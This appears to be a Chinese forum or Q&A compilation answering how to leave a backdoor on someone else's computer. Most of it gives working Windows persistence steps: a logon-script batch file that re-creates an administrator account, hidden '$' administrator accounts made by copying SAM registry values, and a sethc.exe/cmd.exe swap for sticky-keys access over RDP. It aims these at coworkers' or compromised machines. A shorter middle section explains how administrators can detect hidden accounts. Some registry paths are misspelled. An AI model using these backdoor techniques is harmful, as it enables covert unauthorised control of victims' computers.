① 如何在pe文件中手動植入一個後門
小馬PE文件,還有win7,xp的iso文件,如何做成一個可引導啟動的iso文件,系統只放進Gho和Wim文件,用pe里的工具安裝,想知道怎麼整合
② 我有機會經常玩別人電腦,怎麼在他的電腦當中留下後門
一.建立一個別人永遠刪不掉的管理員用戶操作步驟:
1、在自己電腦裡面建立一個.txt文本文件.
2、在裡面輸入內容
@echo off
net user yixiao 123456 /add 注釋:前面yixiao是用戶名後面123456是密碼;
net localgroup administrators yixiao /add
3、把這個文件保存,更改後綴為yixiao.bat 注釋:前面名字隨便,後面格式一定要是bat;
4、把這個文件拷貝到對方電腦C:\WINNT\system32\GroupPolicy\User\scripts\Logon文件目錄下,沒有的話自己創建。
完成,下次對方電腦無論如何都有這個管理員帳號,刪除了,下次啟動還有!
如果把裡面的內容改成
@echo off
net user administrator 123456 /add
意思是不管你怎麼改,下次啟動管理員帳號administrator密碼一直是123456。
二.俺認為上述的方法並不理想,可以用隱藏帳號方法來建帳號會更好 。
操作步驟:
1、首先建立一個帳號結尾要帶$號 ,如果yixiao$ , 密碼自己隨便,然後把帳號刪除.
2、將以下代碼保存成(.reg)注冊表形式
代碼如下:
——————————————————————————-
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHONE\SAM\SAM\Domains\Account\users\
names\yixiao$]
@=hex(1f4):
——————————————————————————-
說明:1f4是Administrator帳號十六進制的值
3、保存好後導入 ,然後用CMD命令設置密碼
net user yixiao$ 123456
這樣一個隱形帳號就建立好了,用戶在「本地用戶和組」內根本無法看到這個帳號。所以也不存在刪除帳號。記得千萬別在同事的電腦上搗鼓哦,如果被查出來。。。。。嘿嘿:-)
隱藏管理員帳號三分鍾搞定
對 regedit.exe我想大家都很熟悉,但卻不能對注冊表的項鍵設置許可權,而regedt32.exe最大的優點就是能夠對注冊表的項鍵設置許可權。 nt/2000/xp的帳戶信息都在注冊表的HKEY_LOCAL_MACHINE\\SAM\\SAM鍵下,但是除了系統用戶SYSTEM外,其它用戶 都無權查看到裡面的信息,因此我首先用regedt32.exe對SAM鍵為我設置為「完全控制」許可權。這樣就可以對SAM鍵內的信息進行讀寫了了。具體 步聚如下:
1、假設我們是以超級用戶administrator登錄到開有終端服務的肉雞上的,首先在命令行下或帳戶管理器中建立一個帳戶:hacker$,這里我在命令行下建立這個帳戶 net user hacker$ 1234 /add
2、在開始/運行中輸入:regedt32.exe並回車來運行regedt32.exe。
3、點「許可權」以後會彈出窗口點添加將我登錄時的帳戶添加到安全欄內,這里我是以administrator的身份登錄的,所以我就將 administrator加入,並設置許可權為「完全控制」。這里需要說明一下:最好是添加你登錄的帳戶或帳戶所在的組,切莫修改原有的帳戶或組,否則將 會帶來一系列不必要的問題。等隱藏超級用戶建好以,再來這里將你添加的帳戶刪除即可。
4、再點「開始」→「運行」並輸 入」regedit.exe」 回車,啟動注冊表編輯器regedit.exe。 打開鍵:HKEY_LOCAL_MAICHINE\\SAM\\SAM\\Domains\\account\\user\\names [url=file://hacker$/]\\hacker$[/url]」
5、將項hacker$、00000409、000001F4導出為hacker.reg、409.reg、 1f4.reg,用記事本分別打這幾個導出的文件進行編輯,將超級用戶對應的項000001F4下的鍵」F」的值復制,並覆蓋hacker$對應的項 00000409下的鍵」F」的值,然後再將00000409.reg與hacker.reg合並。
6、在命令行下執行net user hacker$ /del將用戶hacker$刪除:net user hacker$ /del
7、在regedit.exe的窗口內按F5刷新,然後打文件-導入注冊表文件將修改好的hacker.reg導入注冊表即可
8、到此,隱藏的超級用戶hacker$已經建好了,然後關閉regedit.exe。在regedt32.exe窗口內把HKEY_LOCAL_MACHINE\\SAM\\SAM鍵許可權改回原來的樣子(只要刪除添加的帳戶administrator即可)。
9、注意:隱藏的超級用戶建好後,在帳戶管理器看不到hacker$這個用戶,在命令行用「net user」命令也看不到,但是超級用戶建立以後,就不能再改密碼了,如果用net user命令來改hacker$的密碼的話,那麼在帳戶管理器中將又會看這個隱藏的超級用戶了,而且不能刪除。
那我們管理員又該如何把「隱藏賬戶」請出系統
隱藏賬戶的危害可謂十分巨大。因此我們有必要在了解了賬戶隱藏技術後,再對相應的防範技術作一個了解,把隱藏賬戶徹底請出系統。
1、添加「$」符號型隱藏賬戶
對於這類隱藏賬戶的檢測比較簡單。一般黑客在利用這種方法建立完隱藏賬戶後,會把隱藏賬戶提升為管理員許可權。那麼我們只需要在「命令提示符」中輸入 「net localgroup administrators」就可以讓所有的隱藏賬戶現形。如果嫌麻煩,可以直接打開「計算機管理」進行查看,添加「$」符號的賬戶是無法在這里隱藏 的。
2、修改注冊表型隱藏賬戶
由於使用這種方法隱藏的賬戶是不會在「命令提示符」和「計算機管理」中看到的,因此可以到 注冊表中刪除隱藏賬戶。來到「HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names」,把這 里存在的賬戶和「計算機管理」中存在的賬戶進行比較,多出來的賬戶就是隱藏賬戶了。想要刪除它也很簡單,直接刪除以隱藏賬戶命名的項即可。
3、無法看到名稱的隱藏賬戶
如果黑客製作了一個修改注冊表型隱藏賬戶,在此基礎上刪除了管理員對注冊表的操作許可權。那麼管理員是無法通過注冊表刪除隱藏賬戶的,甚至無法知道黑客建 立的隱藏賬戶名稱。不過世事沒有絕對,我們可以藉助「組策略」的幫助,讓黑客無法通過隱藏賬戶登陸。點擊「開始」→「運行」,輸入 「gpedit.msc」運行「組策略」,依次展開「計算機配置」→「Windows 設置」→「安全設置」→「本地策略」→「審核策略」,雙擊右邊的「審核策略更改」,在彈出的設置窗口中勾選「成功」,然後點「確定」。對「審核登陸事件」 和「審核過程追蹤」進行相同的設置。
進行登陸審核後,可以對任何賬戶的登陸操作進行記錄,包括隱藏賬戶,這樣我們就可以通過「計算機管理」中 的「事件查看器」准確得知隱藏賬戶的名稱,甚至黑客登陸的時間。即使黑客將所有的登陸日誌刪除,系統還會記錄是哪個賬戶刪除了系統日誌,這樣黑客的隱藏賬 戶就暴露無疑了。
得知隱藏賬戶的名稱後就好辦了,但是我們仍然不能刪除這個隱藏賬戶,因為我們沒有許可權。但是我們可以在「命令提示符」中輸入「net user 隱藏賬戶名稱 654321」更改這個隱藏賬戶的密碼。這樣這個隱藏賬戶就會失效,黑客無法再用這個隱藏賬戶登陸。
win2003下創建永遠的隱藏帳戶操作一、二
前段時間比較流行的一句話」肉機」其實要想控制遠端的計算機,那我想就少不了隱藏用戶帳號的問題了,其實創建隱藏用戶帳號還是比較簡單的,現在我就把創建隱藏用戶帳號告訴大家。
其實每一個用戶帳號在注冊表中都有自己帳號數據項
首先我們看看管理員在注冊表中的數據項是什麼樣的
操作一、打開注冊表:HKEY_LOCAL_MACHINE\SAM\SAM
SAM是保存用戶帳號的地方,不過這個「項」在默認情況下是不可見的。我們如果想看內部的內容就必須首先對其授權。(建議對注冊表不是很熟悉的朋友不要隨便改動注冊表)
操作二、認識注冊表中的帳號分類
在OS中的用戶帳號無論是內置帳號,還是後建帳號,在注冊表中都能看見。不過有兩個帳號大家一定要能夠認識,那就是管理員帳號和guest帳號。
」000001fa4」表示的是管理員帳號,即使管理員帳號被重命名了這個值也是不會變的,所以我們可以通過這個值來判斷,重命名後的管理員帳號。
「000001fa5」 表示的是guest帳號,同樣這個值也不會因為,來賓帳號給重命名而改變。剩下的其 它值基本上就是後來創建的用戶帳號,生成值了。 認識了注冊表後,現在我們就來利用」net user」命令創建帳號了,創建隱藏帳號必須在CMD下。有關常見的命令,這些命令也可以在OS的幫助中找到。
操作三、利用」net user」命令創建帳號
一、先建立隱藏用戶 xbx$ 1、net user xbx$ 123,abc /add 這里的意思是說,建立個xbx$ 帳戶密碼是123,abc
1、C:\Documents and Settings\Administrator>net localgroup administrators xbx$ /add 這里的意思是說把xbx,以便讓我們創建用戶具備管理員許可權。
一、觀察注冊表中的變化,並對注冊表做相應的修改。 HKEY_LOCAL_MACHINE\SAM\SAM
1、找到我們剛剛創建的用戶帳號
我們可以看見」000003f6」就是我們剛新建立的」xbx
2、在注冊表中多帳號許可權復制
找到HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users 這個項,打開」000001f4」項,然後再打開」F」。
然後將這裡面的值,全選,粘帖並覆蓋到」000003f6」的」F」值.
3、導出注冊表值
現在將注冊表中的「000001f4」、「000003f6」和「xbx」都導入出來,可直接將Users所有鍵值都導出來,到文件.
4、刪除帳號
接下來我們再次進入「CMD」中刪除「xbx
刪除帳號後,則注冊表中的值也就沒有了,這個時候我們再把剛才導出的注冊表項,導入到注冊表中。 這個時候我們打開「本地計算機用戶和組」就看不見「xbx」
先把system32下的sethc.exe刪除掉,然後 把cmd.exe改名為sethc.exe就OK了,利用的是5次連續敲擊shift的熱鍵功能,下次你3389登陸伺服器的時候,就可以利用熱鍵功能打開cmd,從而增加賬號,就可以登錄伺服器了